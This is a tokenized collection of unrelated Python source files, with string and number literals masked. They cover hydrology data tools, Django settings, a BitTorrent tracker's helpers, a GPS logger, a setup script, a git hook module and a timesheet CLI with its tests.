<s> """<STR_LIT>""" <EOL> import sys <EOL> import argparse <EOL> from ecohydrolib . context import Context <EOL> from ecohydrolib . metadata import GenericMetadata <EOL> from ecohydrolib . metadata import AssetProvenance <EOL> from ecohydrolib . nhdplus2 . webservice import locateStreamflowGage <EOL> from ecohydrolib . nhdplus2 . webservice import RESPONSE_OK <EOL> from ecohydrolib . nhdplus2 . networkanalysis import getNHDReachcodeAndMeasureForGageSourceFea <EOL> from ecohydrolib . nhdplus2 . networkanalysis import getLocationForStreamGageByGageSourceFea <EOL> from ecohydrolib . spatialdata . utils import writeCoordinatePairsToPointShapefile <EOL> parser = argparse . ArgumentParser ( description = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , required = False , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , required = True , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT:source>' , required = False , choices = [ '<STR_LIT>' , '<STR_LIT>' ] , default = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , required = True , <EOL> help = '<STR_LIT>' ) <EOL> args = parser . parse_args ( ) <EOL> cmdline = GenericMetadata . getCommandLine ( ) <EOL> configFile = None <EOL> if args . configfile : <EOL> configFile = args . configfile <EOL> context = Context ( args . projectDir , configFile ) <EOL> if args . source == '<STR_LIT>' : <EOL> sys . stdout . write ( '<STR_LIT>' ) <EOL> sys . stdout . flush ( ) <EOL> if not context . config . has_option ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> sys . exit ( "<STR_LIT>" & ( args . configfile , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> if not context . config . has_option ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> sys . exit ( "<STR_LIT>" & ( args . configfile , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> result = getNHDReachcodeAndMeasureForGageSourceFea ( context . config , args . gageid ) <EOL> if result : <EOL> reachcode = result [ <NUM_LIT:0> ] <EOL> measure = result [ <NUM_LIT:1> ] <EOL> else : <EOL> sys . exit ( "<STR_LIT>" % ( args . gageid , ) ) <EOL> result = getLocationForStreamGageByGageSourceFea ( context . config , args . gageid ) <EOL> if result : <EOL> gage_lat = result [ <NUM_LIT:1> ] <EOL> gage_lon = result [ <NUM_LIT:0> ] <EOL> else : <EOL> sys . exit ( "<STR_LIT>" % ( args . gageid , ) ) <EOL> source = '<STR_LIT>' <EOL> sys . stdout . write ( '<STR_LIT>' ) <EOL> else : <EOL> sys . stdout . write ( '<STR_LIT>' ) <EOL> sys . stdout . flush ( ) <EOL> ( response , source ) = locateStreamflowGage ( context . config , args . gageid ) <EOL> if response [ '<STR_LIT:message>' ] != RESPONSE_OK : <EOL> sys . exit ( "<STR_LIT>" % ( args . gageid , response [ '<STR_LIT:message>' ] ) ) <EOL> else : <EOL> reachcode = response [ '<STR_LIT>' ] <EOL> measure = response [ '<STR_LIT>' ] <EOL> gage_lat = response [ '<STR_LIT>' ] <EOL> gage_lon = response [ '<STR_LIT>' ] <EOL> sys . stdout . write ( '<STR_LIT>' ) <EOL> shpFilename = writeCoordinatePairsToPointShapefile ( context . projectDir , "<STR_LIT>" , <EOL> "<STR_LIT>" , [ args . gageid ] , [ ( gage_lon , gage_lat ) ] ) <EOL> GenericMetadata . writeStudyAreaEntry ( context , '<STR_LIT>' , '<STR_LIT>' ) <EOL> GenericMetadata . writeStudyAreaEntry ( context , '<STR_LIT>' , args . gageid ) <EOL> GenericMetadata . writeStudyAreaEntry ( context , '<STR_LIT>' , reachcode ) <EOL> GenericMetadata . writeStudyAreaEntry ( context , '<STR_LIT>' , measure ) <EOL> GenericMetadata . writeStudyAreaEntry ( context , '<STR_LIT>' , gage_lat ) <EOL> GenericMetadata . writeStudyAreaEntry ( context , '<STR_LIT>' , gage_lon ) <EOL> asset = AssetProvenance ( GenericMetadata . MANIFEST_SECTION ) <EOL> asset . name = '<STR_LIT>' <EOL> asset . dcIdentifier = shpFilename <EOL> asset . dcSource = source <EOL> asset . dcTitle = '<STR_LIT>' <EOL> asset . dcPublisher = '<STR_LIT>' <EOL> asset . dcDescription = cmdline <EOL> asset . writeToMetadata ( context ) <EOL> GenericMetadata . appendProcessingHistoryItem ( context , cmdline ) </s>
<s> """<STR_LIT>""" <EOL> from ecohydrolib . wcslib import getRasterForBoundingBox <EOL> COVERAGE_SRTM_1DEG_AUS = '<STR_LIT>' <EOL> COVERAGE_SRTM_1DEG_AUS_HYDRO = '<STR_LIT>' <EOL> COVERAGE_SRTM_1DEG_AUS_SMOOTH = '<STR_LIT>' <EOL> SUPPORTED_COVERAGE = [ COVERAGE_SRTM_1DEG_AUS , COVERAGE_SRTM_1DEG_AUS_HYDRO , COVERAGE_SRTM_1DEG_AUS_SMOOTH ] <EOL> COVERAGE_DESC = { COVERAGE_SRTM_1DEG_AUS : '<STR_LIT>' , <EOL> COVERAGE_SRTM_1DEG_AUS_HYDRO : '<STR_LIT>' , <EOL> COVERAGE_SRTM_1DEG_AUS_SMOOTH : '<STR_LIT>' } <EOL> FORMAT_GEOTIFF = '<STR_LIT>' <EOL> FORMAT_NITF = '<STR_LIT>' <EOL> FORMAT_HDF = '<STR_LIT>' <EOL> SUPPORTED_FORMATS = [ FORMAT_GEOTIFF , FORMAT_NITF , FORMAT_HDF ] <EOL> MIME_TYPE = { FORMAT_GEOTIFF : '<STR_LIT>' , <EOL> FORMAT_NITF : '<STR_LIT>' , <EOL> FORMAT_HDF : '<STR_LIT>' <EOL> } <EOL> HOST = '<STR_LIT>' <EOL> URL_PROTO = '<STR_LIT>' <EOL> def getDEMForBoundingBox ( config , outputDir , outDEMFilename , bbox , coverage = COVERAGE_SRTM_1DEG_AUS , srs = '<STR_LIT>' , fmt = FORMAT_GEOTIFF , overwrite = True ) : <EOL> """<STR_LIT>""" <EOL> assert ( fmt in SUPPORTED_FORMATS ) <EOL> assert ( coverage in SUPPORTED_COVERAGE ) <EOL> return getRasterForBoundingBox ( config , outputDir , outDEMFilename , HOST , URL_PROTO , MIME_TYPE [ fmt ] , bbox , coverage , srs , fmt , <EOL> response_crs = srs , store = False , overwrite = overwrite ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> BASE_DIR = os . path . dirname ( os . path . dirname ( os . path . abspath ( __file__ ) ) ) <EOL> AUTH_USER_MODEL = '<STR_LIT>' <EOL> with open ( '<STR_LIT>' ) as fp : <EOL> SECRET_KEY = fp . read ( ) . strip ( ) <EOL> DEBUG = True <EOL> ALLOWED_HOSTS = [ ] <EOL> INSTALLED_APPS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> MIDDLEWARE_CLASSES = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> ROOT_URLCONF = '<STR_LIT>' <EOL> TEMPLATES = [ <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> } , <EOL> } , <EOL> ] <EOL> WSGI_APPLICATION = '<STR_LIT>' <EOL> DATABASES = { <EOL> '<STR_LIT:default>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:localhost>' , <EOL> } <EOL> } <EOL> with open ( BASE_DIR + '<STR_LIT>' ) as fp : <EOL> DATABASES [ '<STR_LIT:default>' ] [ '<STR_LIT>' ] = fp . read ( ) . strip ( ) <EOL> LANGUAGE_CODE = '<STR_LIT>' <EOL> TIME_ZONE = '<STR_LIT>' <EOL> USE_I18N = True <EOL> USE_L10N = True <EOL> USE_TZ = True <EOL> STATIC_URL = '<STR_LIT>' </s>
<s> import os <EOL> import logging <EOL> import logging . handlers <EOL> import shelve <EOL> from socket import inet_aton <EOL> from struct import pack <EOL> import tornado . web <EOL> import binascii <EOL> try : <EOL> from ConfigParser import RawConfigParser <EOL> from httplib import responses <EOL> except ImportError : <EOL> from configparser import RawConfigParser <EOL> from http . client import responses <EOL> CONFIG_PATH = os . path . expanduser ( '<STR_LIT>' ) <EOL> DB_PATH = os . path . expanduser ( '<STR_LIT>' ) <EOL> LOG_PATH = os . path . expanduser ( '<STR_LIT>' ) <EOL> PEER_INCREASE_LIMIT = <NUM_LIT:30> <EOL> DEFAULT_ALLOWED_PEERS = <NUM_LIT:50> <EOL> MAX_ALLOWED_PEERS = <NUM_LIT> <EOL> INFO_HASH_LEN = <NUM_LIT:20> * <NUM_LIT:2> <EOL> PEER_ID_LEN = <NUM_LIT:20> <EOL> INVALID_REQUEST_TYPE = <NUM_LIT:100> <EOL> MISSING_INFO_HASH = <NUM_LIT> <EOL> MISSING_PEER_ID = <NUM_LIT> <EOL> MISSING_PORT = <NUM_LIT> <EOL> INVALID_INFO_HASH = <NUM_LIT> <EOL> INVALID_PEER_ID = <NUM_LIT> <EOL> INVALID_NUMWANT = <NUM_LIT> <EOL> GENERIC_ERROR = <NUM_LIT> <EOL> PYTT_RESPONSE_MESSAGES = { <EOL> INVALID_REQUEST_TYPE : '<STR_LIT>' , <EOL> MISSING_INFO_HASH : '<STR_LIT>' , <EOL> MISSING_PEER_ID : '<STR_LIT>' , <EOL> MISSING_PORT : '<STR_LIT>' , <EOL> INVALID_INFO_HASH : '<STR_LIT>' % INFO_HASH_LEN , <EOL> INVALID_PEER_ID : '<STR_LIT>' % PEER_ID_LEN , <EOL> INVALID_NUMWANT : '<STR_LIT>' % MAX_ALLOWED_PEERS , <EOL> GENERIC_ERROR : '<STR_LIT>' , <EOL> } <EOL> responses . update ( PYTT_RESPONSE_MESSAGES ) <EOL> logger = logging . getLogger ( '<STR_LIT>' ) <EOL> def setup_logging ( debug = False ) : <EOL> """<STR_LIT>""" <EOL> if debug : <EOL> level = logging . DEBUG <EOL> else : <EOL> level = logging . INFO <EOL> log_handler = logging . handlers . RotatingFileHandler ( LOG_PATH , <EOL> maxBytes = <NUM_LIT> * <NUM_LIT> , <EOL> backupCount = <NUM_LIT:2> ) <EOL> root_logger = logging . getLogger ( '<STR_LIT>' ) <EOL> root_logger . setLevel ( level ) <EOL> format = '<STR_LIT>' <EOL> formatter = logging . Formatter ( format ) <EOL> log_handler . setFormatter ( formatter ) <EOL> root_logger . addHandler ( log_handler ) <EOL> def create_config ( path ) : <EOL> """<STR_LIT>""" <EOL> logging . info ( '<STR_LIT>' % CONFIG_PATH ) <EOL> config = RawConfigParser ( ) <EOL> config . add_section ( '<STR_LIT>' ) <EOL> config . set ( '<STR_LIT>' , '<STR_LIT:port>' , '<STR_LIT>' ) <EOL> config . set ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:5>' ) <EOL> config . set ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> with open ( path , '<STR_LIT:w>' ) as f : <EOL> config . write ( f ) <EOL> def create_pytt_dirs ( ) : <EOL> """<STR_LIT>""" <EOL> logging . info ( '<STR_LIT>' ) <EOL> for path in [ CONFIG_PATH , DB_PATH , LOG_PATH ] : <EOL> dirname = os . path . dirname ( path ) <EOL> if not os . path . exists ( dirname ) : <EOL> os . makedirs ( dirname ) <EOL> if not os . path . exists ( CONFIG_PATH ) : <EOL> create_config ( CONFIG_PATH ) <EOL> class BaseHandler ( tornado . web . RequestHandler ) : <EOL> """<STR_LIT>""" <EOL> def decode_argument ( self , value , name ) : <EOL> if name == '<STR_LIT>' : <EOL> value = binascii . hexlify ( value ) <EOL> return super ( BaseHandler , self ) . decode_argument ( value , name ) <EOL> class ConfigError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> class Config : <EOL> """<STR_LIT>""" <EOL> __shared_state = { } <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> self . __dict__ = self . __shared_state <EOL> def get ( self ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> self . __config = RawConfigParser ( ) <EOL> if self . __config . read ( CONFIG_PATH ) == [ ] : <EOL> raise ConfigError ( '<STR_LIT>' % CONFIG_PATH ) <EOL> return self . __config <EOL> def close ( self ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> return <NUM_LIT:0> <EOL> del self . __config <EOL> class Database : <EOL> """<STR_LIT>""" <EOL> __shared_state = { } <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> self . __dict__ = self . __shared_state <EOL> def get ( self ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> self . __db = shelve . open ( DB_PATH , writeback = True ) <EOL> return self . __db <EOL> def close ( self ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> return <NUM_LIT:0> <EOL> self . __db . close ( ) <EOL> del self . __db <EOL> def get_config ( ) : <EOL> """<STR_LIT>""" <EOL> return Config ( ) . get ( ) <EOL> def get_db ( ) : <EOL> """<STR_LIT>""" <EOL> return Database ( ) . get ( ) <EOL> def close_db ( ) : <EOL> """<STR_LIT>""" <EOL> Database ( ) . close ( ) <EOL> def no_of_seeders ( info_hash ) : <EOL> """<STR_LIT>""" <EOL> db = get_db ( ) <EOL> count = <NUM_LIT:0> <EOL> if info_hash in db : <EOL> for peer_info in db [ info_hash ] : <EOL> if peer_info [ <NUM_LIT:3> ] == '<STR_LIT>' : <EOL> count += <NUM_LIT:1> <EOL> return count <EOL> def no_of_leechers ( info_hash ) : <EOL> """<STR_LIT>""" <EOL> db = get_db ( ) <EOL> count = <NUM_LIT:0> <EOL> if info_hash in db : <EOL> for peer_info in db [ info_hash ] : <EOL> if peer_info [ <NUM_LIT:3> ] == '<STR_LIT>' : <EOL> count += <NUM_LIT:1> <EOL> return count <EOL> def store_peer_info ( info_hash , peer_id , ip , port , status ) : <EOL> """<STR_LIT>""" <EOL> db = get_db ( ) <EOL> if info_hash in db : <EOL> if ( peer_id , ip , port , status ) not in db [ info_hash ] : <EOL> db [ info_hash ] . append ( ( peer_id , ip , port , status ) ) <EOL> else : <EOL> db [ info_hash ] = [ ( peer_id , ip , port , status ) ] <EOL> def get_peer_list ( info_hash , numwant , compact , no_peer_id ) : <EOL> """<STR_LIT>""" <EOL> db = get_db ( ) <EOL> if compact : <EOL> byteswant = numwant * <NUM_LIT:6> <EOL> compact_peers = b'<STR_LIT>' <EOL> if info_hash in db : <EOL> for peer_info in db [ info_hash ] : <EOL> ip = inet_aton ( peer_info [ <NUM_LIT:1> ] ) <EOL> port = pack ( '<STR_LIT>' , int ( peer_info [ <NUM_LIT:2> ] ) ) <EOL> compact_peers += ( ip + port ) <EOL> logging . debug ( '<STR_LIT>' % compact_peers [ : byteswant ] ) <EOL> return compact_peers [ : byteswant ] <EOL> else : <EOL> peers = [ ] <EOL> if info_hash in db : <EOL> for peer_info in db [ info_hash ] : <EOL> p = { } <EOL> p [ '<STR_LIT>' ] , p [ '<STR_LIT>' ] , p [ '<STR_LIT:port>' ] , _ = peer_info <EOL> if no_peer_id : <EOL> del p [ '<STR_LIT>' ] <EOL> peers . append ( p ) <EOL> logging . debug ( '<STR_LIT>' % peers [ : numwant ] ) <EOL> return peers [ : numwant ] </s>
<s> import location <EOL> import gobject <EOL> import sys <EOL> import time <EOL> import math <EOL> if len ( sys . argv ) < <NUM_LIT:3> : <EOL> sys . stderr . write ( '<STR_LIT>' + sys . argv [ <NUM_LIT:0> ] + '<STR_LIT>' ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> acc = <NUM_LIT> <EOL> prepend_text = sys . argv [ <NUM_LIT:3> ] <EOL> sleep_time = int ( sys . argv [ <NUM_LIT:2> ] ) <EOL> filename = sys . argv [ <NUM_LIT:1> ] <EOL> class gps_fix : <EOL> fix = None <EOL> def on_error ( self , control , error , data ) : <EOL> print "<STR_LIT>" % error <EOL> data . quit ( ) <EOL> def on_changed ( self , device , data ) : <EOL> if not device : <EOL> return <EOL> cacc = "<STR_LIT>" % ( time . time ( ) , device . fix [ <NUM_LIT:4> ] , device . fix [ <NUM_LIT:5> ] , device . fix [ <NUM_LIT:6> ] / <NUM_LIT:100> , device . fix [ <NUM_LIT:11> ] ) <EOL> if not device . fix [ <NUM_LIT:6> ] == device . fix [ <NUM_LIT:6> ] : <EOL> return <EOL> if device . fix [ <NUM_LIT:6> ] > acc : <EOL> return <EOL> if device . fix : <EOL> if device . fix [ <NUM_LIT:1> ] & location . GPS_DEVICE_LATLONG_SET : <EOL> f = open ( filename , "<STR_LIT:a>" ) <EOL> pos = "<STR_LIT>" % ( prepend_text , time . time ( ) , device . fix [ <NUM_LIT:4> ] , device . fix [ <NUM_LIT:5> ] , device . fix [ <NUM_LIT:6> ] / <NUM_LIT:100> ) <EOL> self . fix = ( device . fix [ <NUM_LIT:4> ] , device . fix [ <NUM_LIT:5> ] ) <EOL> f . write ( pos ) <EOL> f . write ( "<STR_LIT:\n>" ) <EOL> f . close ( ) <EOL> data . stop ( ) <EOL> def on_stop ( self , control , data ) : <EOL> data . quit ( ) <EOL> def start_location ( self , data ) : <EOL> data . start ( ) <EOL> return False <EOL> def __init__ ( self ) : <EOL> loop = gobject . MainLoop ( ) <EOL> control = location . GPSDControl . get_default ( ) <EOL> device = location . GPSDevice ( ) <EOL> control . set_properties ( preferred_method = location . METHOD_USER_SELECTED , <EOL> preferred_interval = location . INTERVAL_DEFAULT ) <EOL> control . connect ( "<STR_LIT>" , self . on_error , loop ) <EOL> device . connect ( "<STR_LIT>" , self . on_changed , control ) <EOL> control . connect ( "<STR_LIT>" , self . on_stop , loop ) <EOL> gobject . idle_add ( self . start_location , control ) <EOL> loop . run ( ) <EOL> def haversine ( lat1 , lon1 , lat2 , lon2 ) : <EOL> R = <NUM_LIT> <EOL> dLat = math . radians ( lat2 - lat1 ) <EOL> dLon = math . radians ( lon2 - lon1 ) <EOL> lat1 = math . radians ( lat1 ) <EOL> lat2 = math . radians ( lat2 ) <EOL> a = math . sin ( dLat / <NUM_LIT:2> ) * math . sin ( dLat / <NUM_LIT:2> ) + math . sin ( dLon / <NUM_LIT:2> ) * math . sin ( dLon / <NUM_LIT:2> ) * math . cos ( lat1 ) * math . cos ( lat2 ) <EOL> c = <NUM_LIT:2> * math . asin ( math . sqrt ( a ) ) <EOL> return R * c * <NUM_LIT> <EOL> lastPos = ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> while ( <NUM_LIT:1> ) : <EOL> g = gps_fix ( ) <EOL> distanceMoved = haversine ( lastPos [ <NUM_LIT:0> ] , lastPos [ <NUM_LIT:1> ] , g . fix [ <NUM_LIT:0> ] , g . fix [ <NUM_LIT:1> ] ) <EOL> if ( distanceMoved < <NUM_LIT:100> ) : <EOL> time . sleep ( sleep_time ) <EOL> lastPos = ( g . fix [ <NUM_LIT:0> ] , g . fix [ <NUM_LIT:1> ] ) </s>
<s> import sys , os , shutil <EOL> from distutils . core import setup , Extension <EOL> shutil . copyfile ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> setup ( name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> packages = [ "<STR_LIT>" ] , <EOL> package_dir = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> scripts = [ '<STR_LIT>' ] , <EOL> data_files = [ ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) ] , <EOL> ) <EOL> print "<STR_LIT>" <EOL> try : <EOL> removeall ( "<STR_LIT>" ) <EOL> os . rmdir ( "<STR_LIT>" ) <EOL> except : <EOL> pass <EOL> try : <EOL> os . remove ( "<STR_LIT>" ) <EOL> except : <EOL> pass <EOL> def capture ( cmd ) : <EOL> return os . popen ( cmd ) . read ( ) . strip ( ) <EOL> def removeall ( path ) : <EOL> if not os . path . isdir ( path ) : <EOL> return <EOL> files = os . listdir ( path ) <EOL> for x in files : <EOL> fullpath = os . path . join ( path , x ) <EOL> if os . path . isfile ( fullpath ) : <EOL> f = os . remove <EOL> rmgeneric ( fullpath , f ) <EOL> elif os . path . isdir ( fullpath ) : <EOL> removeall ( fullpath ) <EOL> f = os . rmdir <EOL> rmgeneric ( fullpath , f ) <EOL> def rmgeneric ( path , __func__ ) : <EOL> try : <EOL> __func__ ( path ) <EOL> except OSError , ( errno , strerror ) : <EOL> pass </s>
<s> import stawk_db <EOL> import datetime <EOL> cursor = stawk_db . dbconnect ( ) <EOL> drones = [ ] <EOL> day = '<STR_LIT>' <EOL> st = day + '<STR_LIT>' <EOL> fi = day + '<STR_LIT>' <EOL> cursor . execute ( "<STR_LIT>" , ( st , fi ) ) <EOL> for r in cursor . fetchall ( ) : <EOL> drones . append ( ( r [ <NUM_LIT:0> ] , r [ <NUM_LIT:1> ] , r [ <NUM_LIT:2> ] ) ) <EOL> for d in drones : <EOL> drone_id = d [ <NUM_LIT:0> ] <EOL> print drone_id <EOL> fp , lp = d [ <NUM_LIT:1> ] , d [ <NUM_LIT:2> ] <EOL> fp = fp - datetime . timedelta ( minutes = fp . minute , seconds = fp . second ) <EOL> lp = lp - datetime . timedelta ( minutes = ( lp . minute - <NUM_LIT> ) , seconds = lp . second ) <EOL> hours = ( ( ( lp - fp ) ) . seconds ) / <NUM_LIT> <EOL> for h in range ( hours ) : <EOL> frm = fp + datetime . timedelta ( hours = h ) <EOL> to = fp + datetime . timedelta ( hours = h + <NUM_LIT:1> ) <EOL> cursor . execute ( "<STR_LIT>" , ( frm , to , drone_id ) ) <EOL> count = int ( cursor . fetchone ( ) [ <NUM_LIT:0> ] ) <EOL> print "<STR_LIT>" % ( frm . strftime ( "<STR_LIT>" ) , to . strftime ( "<STR_LIT>" ) , count ) </s>
<s> from gitdh . modules import Module <EOL> from gitdh import git <EOL> from syslog import syslog , LOG_INFO , LOG_WARNING <EOL> class PostReceiveSource ( Module ) : <EOL> def isEnabled ( self , action ) : <EOL> return action == "<STR_LIT>" <EOL> def source ( self ) : <EOL> firstCommit = self . args [ <NUM_LIT:0> ] <EOL> lastCommit = self . args [ <NUM_LIT:1> ] <EOL> ref = self . args [ <NUM_LIT:2> ] <EOL> if ref . find ( "<STR_LIT>" ) == <NUM_LIT:0> : <EOL> branch = ref [ <NUM_LIT:11> : ] <EOL> else : <EOL> syslog ( LOG_WARNING , "<STR_LIT>" % ( ref , self . config . repoPath ) ) <EOL> return [ ] <EOL> try : <EOL> self . config . branches [ branch ] <EOL> except KeyError : <EOL> syslog ( LOG_INFO , "<STR_LIT>" % ( branch , self . config . repoPath ) ) <EOL> return [ ] <EOL> try : <EOL> gitRepo = git . Git ( self . config . repoPath ) <EOL> commits = gitRepo . getLog ( since = firstCommit , until = lastCommit , branch = branch ) <EOL> except git . GitException as e : <EOL> syslog ( LOG_WARNING , "<STR_LIT>" % ( e , ) ) <EOL> return [ ] <EOL> for commit in commits : <EOL> commit . status = "<STR_LIT>" <EOL> return commits </s>
<s> '''<STR_LIT>''' <EOL> from shovel import task <EOL> @ task <EOL> def hello ( ) : <EOL> '''<STR_LIT>''' <EOL> pass </s>
<s> from __future__ import unicode_literals <EOL> import calendar <EOL> import datetime <EOL> import click <EOL> from . base import cli , get_timesheet_collection_for_context <EOL> @ cli . command ( short_help = "<STR_LIT>" ) <EOL> @ click . option ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:f>' , <EOL> type = click . Path ( dir_okay = False , writable = True ) ) <EOL> @ click . pass_context <EOL> def autofill ( ctx , f ) : <EOL> """<STR_LIT>""" <EOL> auto_fill_days = ctx . obj [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> if not auto_fill_days : <EOL> ctx . obj [ '<STR_LIT>' ] . view . err ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return <EOL> today = datetime . date . today ( ) <EOL> last_day = calendar . monthrange ( today . year , today . month ) <EOL> last_date = datetime . date ( today . year , today . month , last_day [ <NUM_LIT:1> ] ) <EOL> timesheet_collection = get_timesheet_collection_for_context ( <EOL> ctx , f <EOL> ) <EOL> t = timesheet_collection . timesheets [ <NUM_LIT:0> ] <EOL> t . prefill ( auto_fill_days , last_date ) <EOL> t . file . write ( t . entries ) <EOL> ctx . obj [ '<STR_LIT>' ] . msg ( "<STR_LIT>" ) </s>
<s> from __future__ import unicode_literals <EOL> import codecs <EOL> import collections <EOL> import copy <EOL> from functools import wraps <EOL> import os <EOL> import re <EOL> import six <EOL> import shutil <EOL> import tempfile <EOL> from unittest import TestCase <EOL> from click . testing import CliRunner <EOL> from taxi . backends import BaseBackend , PushEntryFailed , PushEntriesFailed <EOL> from taxi . backends . registry import backends_registry <EOL> from taxi . commands . base import cli <EOL> from taxi . projects import ProjectsDb <EOL> from taxi . utils . file import expand_date <EOL> class TestBackendEntryPoint ( object ) : <EOL> """<STR_LIT>""" <EOL> class TestBackend ( BaseBackend ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( TestBackendEntryPoint . TestBackend , self ) . __init__ ( <EOL> * args , ** kwargs <EOL> ) <EOL> self . entries = [ ] <EOL> def push_entry ( self , date , entry ) : <EOL> self . entries . append ( entry ) <EOL> if entry . alias == '<STR_LIT>' : <EOL> raise PushEntryFailed ( ) <EOL> def post_push_entries ( self ) : <EOL> failed_entries = { } <EOL> for entry in self . entries : <EOL> if entry . alias == '<STR_LIT>' : <EOL> failed_entries [ entry ] = '<STR_LIT>' <EOL> if failed_entries : <EOL> raise PushEntriesFailed ( entries = failed_entries ) <EOL> def load ( self ) : <EOL> return self . TestBackend <EOL> class CommandTestCase ( TestCase ) : <EOL> def setUp ( self ) : <EOL> _ , self . config_file = tempfile . mkstemp ( ) <EOL> _ , self . entries_file = tempfile . mkstemp ( ) <EOL> self . taxi_dir = tempfile . mkdtemp ( ) <EOL> self . backends_original_entry_points = backends_registry . _entry_points <EOL> backends_registry . _entry_points = { <EOL> '<STR_LIT:test>' : TestBackendEntryPoint ( ) , <EOL> '<STR_LIT>' : TestBackendEntryPoint ( ) , <EOL> } <EOL> projects_db_file = os . path . join ( self . taxi_dir , <EOL> ProjectsDb . PROJECTS_FILE ) <EOL> with open ( projects_db_file , '<STR_LIT:w>' ) as f : <EOL> f . close ( ) <EOL> existing_settings = ( self . _settings <EOL> if hasattr ( self , '<STR_LIT>' ) <EOL> else { } ) <EOL> self . _settings = recursive_update ( { <EOL> '<STR_LIT:default>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:file>' : self . entries_file , <EOL> '<STR_LIT>' : '<STR_LIT:0>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:test>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> } , existing_settings ) <EOL> def tearDown ( self ) : <EOL> backends_registry . _entry_points = self . backends_original_entry_points <EOL> entries_file = expand_date ( self . entries_file ) <EOL> os . remove ( self . config_file ) <EOL> if os . path . exists ( entries_file ) : <EOL> os . remove ( entries_file ) <EOL> shutil . rmtree ( self . taxi_dir ) <EOL> def assertLineIn ( self , line , content ) : <EOL> """<STR_LIT>""" <EOL> def remove_spaces ( text ) : <EOL> chars_to_strip = [ '<STR_LIT:U+0020>' , '<STR_LIT:\t>' ] <EOL> for char in chars_to_strip : <EOL> text = text . replace ( char , '<STR_LIT>' ) <EOL> return text <EOL> self . assertIn ( <EOL> remove_spaces ( line ) , <EOL> remove_spaces ( content ) , <EOL> "<STR_LIT>" % ( line , content ) <EOL> ) <EOL> def settings ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return override_settings ( * args , container = self , ** kwargs ) <EOL> def write_config ( self , config ) : <EOL> with open ( self . config_file , '<STR_LIT:w>' ) as f : <EOL> for ( section , params ) in six . iteritems ( config ) : <EOL> f . write ( "<STR_LIT>" % section ) <EOL> for ( param , value ) in six . iteritems ( params ) : <EOL> f . write ( "<STR_LIT>" % ( param , value ) ) <EOL> def write_entries ( self , contents ) : <EOL> with codecs . open ( expand_date ( self . entries_file ) , '<STR_LIT:a>' , '<STR_LIT:utf-8>' ) as f : <EOL> f . write ( contents ) <EOL> def read_entries ( self ) : <EOL> with codecs . open ( expand_date ( self . entries_file ) , '<STR_LIT:r>' , '<STR_LIT:utf-8>' ) as f : <EOL> contents = f . read ( ) <EOL> return contents <EOL> def run_command ( self , command_name , args = None , input = None ) : <EOL> """<STR_LIT>""" 